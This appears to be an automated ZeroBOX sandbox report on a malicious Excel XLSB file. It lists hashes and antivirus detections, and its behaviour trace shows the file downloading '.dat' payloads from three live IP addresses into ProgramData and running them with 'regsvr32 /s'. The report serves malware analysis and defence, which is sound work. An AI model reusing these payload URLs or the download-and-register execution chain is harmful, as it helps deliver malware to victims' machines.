popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

SNC-612086596-Apr-6.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 7, 2022, 11:23 a.m. April 7, 2022, 11:25 a.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 4625181b70514f226dcddbb7e9ff87fd
SHA256 b7cdf96a1312ef4996f18b710215c9a00d40219867d80095b635ce4dbd2fdb23
CRC32 0D321736
ssdeep 24576:GF+BnmJkeGC2PbA/HMoNYIPeuVe2HHCkm6CyIwl6hafINeWHWR72vF+BnmJkeGC9:6ymaeGC9YSeQHCkXC/wl6LcW2929ymaW
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
104.225.129.111 Active Moloch
212.46.38.179 Active Moloch
91.234.254.131 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address suspicious_request GET http://212.46.38.179/7790983516.dat
suspicious_features Connection to IP address suspicious_request GET http://91.234.254.131/7790983516.dat
request GET http://212.46.38.179/7790983516.dat
request GET http://91.234.254.131/7790983516.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08680000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Frister.ocx
file C:\ProgramData\Frister1.ocx
file C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000040c
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000444
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-612086596-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\ProgramData\Frister.ocx
cmdline regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline regsvr32 /s C:\ProgramData\Frister1.ocx
Sangfor Malware.Generic-XLM.Save.ma35
Cyren XF/SneakyBin.E.gen!Eldorado
Kaspersky HEUR:Trojan.MSOffice.Generic
Tencent Trojan.MsOffice.Macro40.11003135
McAfee-GW-Edition X97M/Downloader.nf
Ikarus Trojan-Downloader.XLM.Agent
GData Macro.Trojan-Downloader.Agent.BDH
ZoneAlarm HEUR:Trojan.MSOffice.Generic
Fortinet MSExcel/Agent.IF!tr.dldr
host 104.225.129.111
host 212.46.38.179
host 91.234.254.131
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://104.225.129.111/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
2148270085 0

URLDownloadToFileW

 url: http://212.46.38.179/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
2148270088 0

URLDownloadToFileW

 url: http://91.234.254.131/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
2148270088 0
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister2.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister1.ocx
dead_host 104.225.129.111:80